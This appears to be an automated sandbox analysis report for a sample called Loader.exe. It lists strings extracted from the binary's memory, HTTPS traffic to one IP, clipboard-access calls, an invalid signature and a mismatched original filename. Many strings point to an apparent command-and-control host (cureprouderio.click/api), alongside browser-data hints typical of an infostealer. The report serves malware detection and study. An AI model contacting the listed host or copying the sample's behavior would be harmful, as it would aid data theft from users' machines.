Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Loader.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Loader.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Loader.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Loader.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Loader.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Loader.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Loader.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Loader.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Loader.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Loader.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: Loader.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Loader.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Loader.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Loader.exe, 00000003.00000003.2234239277.0000000002C56000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235035160.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.clic
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235035160.0000000002C58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/
Source: Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/6CB
Source: Loader.exe, 00000003.00000003.2145796817.0000000005365000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/8D7Qw/Wo
Source: Loader.exe, 00000003.00000003.2145695820.0000000005365000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145765606.0000000005365000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/8D7Qw/WoB
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/;0
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/_0
Source: Loader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171228984.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177047912.0000000002C6E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189727332.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2120544884.0000000005362000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235106849.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171213877.0000000002C6E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2120867299.0000000005364000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171228984.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/api
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/api)
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/api9
Source: Loader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/apiprog
Source: Loader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/apiwn
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/c
Source: Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/pi
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/piD0S
Source: Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click:443/api
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Loader.exe, 00000003.00000002.2235463947.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2170956786.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189552535.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177005335.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Loader.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00433500

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00433500

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A61000	0_2_00A61000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A6F555	0_2_00A6F555
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A87792	0_2_00A87792
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A79CC0	0_2_00A79CC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A85C5E	0_2_00A85C5E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A73FB2	0_2_00A73FB2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004098CE	3_2_004098CE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004230D3	3_2_004230D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426090	3_2_00426090
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040D11B	3_2_0040D11B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042C98C	3_2_0042C98C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043DBAC	3_2_0043DBAC
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00409400	3_2_00409400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004384B0	3_2_004384B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041052C	3_2_0041052C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043FEF0	3_2_0043FEF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00440770	3_2_00440770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004387D0	3_2_004387D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00429070	3_2_00429070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00409000	3_2_00409000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00428000	3_2_00428000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041C0C0	3_2_0041C0C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004058D0	3_2_004058D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004038D0	3_2_004038D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423750	3_2_00423750
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043E8A7	3_2_0043E8A7
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042A950	3_2_0042A950
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042217D	3_2_0042217D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041C920	3_2_0041C920
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004301D5	3_2_004301D5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004239E0	3_2_004239E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004391E1	3_2_004391E1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00408180	3_2_00408180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00406180	3_2_00406180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00440180	3_2_00440180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041E990	3_2_0041E990
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041A190	3_2_0041A190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00419190	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041B9A0	3_2_0041B9A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00418241	3_2_00418241
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041FA74	3_2_0041FA74
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00430A78	3_2_00430A78
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00417207	3_2_00417207
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00433210	3_2_00433210
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00428A31	3_2_00428A31
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415A3C	3_2_00415A3C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042C2C1	3_2_0042C2C1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00404280	3_2_00404280
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004142A0	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00417AB8	3_2_00417AB8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423B40	3_2_00423B40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041D350	3_2_0041D350
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00421B00	3_2_00421B00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042D306	3_2_0042D306
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00411BC0	3_2_00411BC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004163C0	3_2_004163C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004393D0	3_2_004393D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004383D0	3_2_004383D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004073F0	3_2_004073F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042D3F1	3_2_0042D3F1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00425380	3_2_00425380
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F380	3_2_0043F380
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00422B84	3_2_00422B84
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041CB90	3_2_0041CB90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042D391	3_2_0042D391
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00422BA0	3_2_00422BA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00404BB0	3_2_00404BB0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00440450	3_2_00440450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042B46E	3_2_0042B46E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00436C7D	3_2_00436C7D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426430	3_2_00426430
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042B435	3_2_0042B435
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00418CE1	3_2_00418CE1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00439C8E	3_2_00439C8E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F490	3_2_0043F490
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040CC99	3_2_0040CC99
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040E49F	3_2_0040E49F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004374A3	3_2_004374A3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00427D52	3_2_00427D52
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042856C	3_2_0042856C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415506	3_2_00415506
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00427527	3_2_00427527
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043EDCE	3_2_0043EDCE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F5E0	3_2_0043F5E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00437D80	3_2_00437D80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041D5B0	3_2_0041D5B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00406610	3_2_00406610
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042E617	3_2_0042E617
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00405E20	3_2_00405E20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00427E22	3_2_00427E22
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00428630	3_2_00428630
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00430637	3_2_00430637
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426639	3_2_00426639
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00402ED0	3_2_00402ED0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00417EEE	3_2_00417EEE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F690	3_2_0043F690
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415E9A	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00414EA0	3_2_00414EA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040F6AA	3_2_0040F6AA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042774C	3_2_0042774C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423750	3_2_00423750
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00421770	3_2_00421770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040AF23	3_2_0040AF23
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F730	3_2_0043F730
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043C730	3_2_0043C730
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00410FC8	3_2_00410FC8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426FD0	3_2_00426FD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00437FE0	3_2_00437FE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040A780	3_2_0040A780
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041CFA0	3_2_0041CFA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004257AC	3_2_004257AC
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A61000	3_2_00A61000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A6F555	3_2_00A6F555
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A87792	3_2_00A87792
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A79CC0	3_2_00A79CC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A85C5E	3_2_00A85C5E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A73FB2	3_2_00A73FB2

Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00A6FA60 appears 100 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00A7CFD6 appears 40 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00A6FAE4 appears 34 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00407F80 appears 48 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00A780F8 appears 42 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00A70730 appears 38 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00414290 appears 76 times

Source: Loader.exe

Static PE information: invalid certificate

Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
Source: Loader.exe, 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
Source: Loader.exe, 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
Source: Loader.exe, 00000003.00000003.2027261292.0000000002B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
Source: Loader.exe	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe

